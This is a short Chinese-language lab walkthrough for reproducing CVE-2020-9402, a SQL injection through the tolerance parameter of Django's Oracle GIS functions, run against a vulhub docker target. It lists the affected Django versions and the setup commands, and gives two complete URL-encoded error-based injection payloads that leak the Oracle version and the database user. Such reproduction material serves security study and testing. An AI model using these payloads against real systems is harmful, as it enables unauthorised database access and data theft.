漏洞简介
漏洞编号
CVE-2020-9402
漏洞介绍
CVE-2020-9402:在Oracle上的GIS函数和聚合中通过公差参数进行潜在的SQL注入
影响版本
- Django master branch
- Django 3.0
- Django 2.2
- Django 1.11
环境搭建
cd vulhub/django/CVE-2020-9402
docker-compose up -d
漏洞复现
第一个注入点
进入容器中通过 sqlplus 命令查看 Oracle 数据库的版本号
docker ps
docker exec -it 容器ID /bin/bash
sqlplus
访问 your-ip:8000/vuln/ 查看靶场是否成功启动
通过get方法在q参数处构建payload
http://your-ip:8000/vuln/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1
网页报错,注入成功获取到Oracle的版本信息
第二个注入点
your-ip:8000/vuln2/?q=0.05
同样在q参数处构建payload完成报错注入
http://your-ip:8000/vuln2/?q=0.05)))%20FROM%20%22VULN_COLLECTION2%22%20%20where%20%20(select%20utl_inaddr.get_host_name((SELECT%20user%20FROM%20DUAL))%20from%20dual)%20is%20not%20null%20%20--